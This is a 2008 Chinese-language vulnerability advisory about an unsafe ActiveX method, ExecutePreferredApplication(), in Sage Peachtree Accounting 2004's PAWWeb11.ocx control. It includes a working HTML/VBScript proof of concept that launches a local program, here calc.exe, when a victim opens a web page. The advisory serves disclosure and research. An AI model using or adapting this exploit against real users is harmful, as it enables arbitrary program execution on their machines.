发布日期：2008-09-10
更新日期：2008-09-23

受影响系统：

Sage Software Peachtree Accounting 2004

描述：

---

BUGTRAQ  ID: 31096

Peachtree Accounting是由Sage开发的专业财务软件。

Peachtree Accounting所安装的PAWWeb11.ocx ActiveX控件没有安全的调用ExecutePreferredApplication()方式，如果用户受骗访问了恶意网页的话就可能导致执行用户系统上的任意应用程序。

<*来源：Jeremy Brown
  
  链接：http://secunia.com/advisories/31809/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html><body>

<object id=target classid=clsid:2BCEAECE-6121-4E78-816C-8CD3121361B0></object>
<script language=vbscript>


arg1="C:/WINDOWS/system32/calc.exe"
target.ExecutePreferredApplication arg1

</script>
</body></html>

建议：

---

厂商补丁：

Sage Software
-------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.peachtree.com/peachtreeaccountingline/

浏览次数：2328
严重程度：0（网友投票）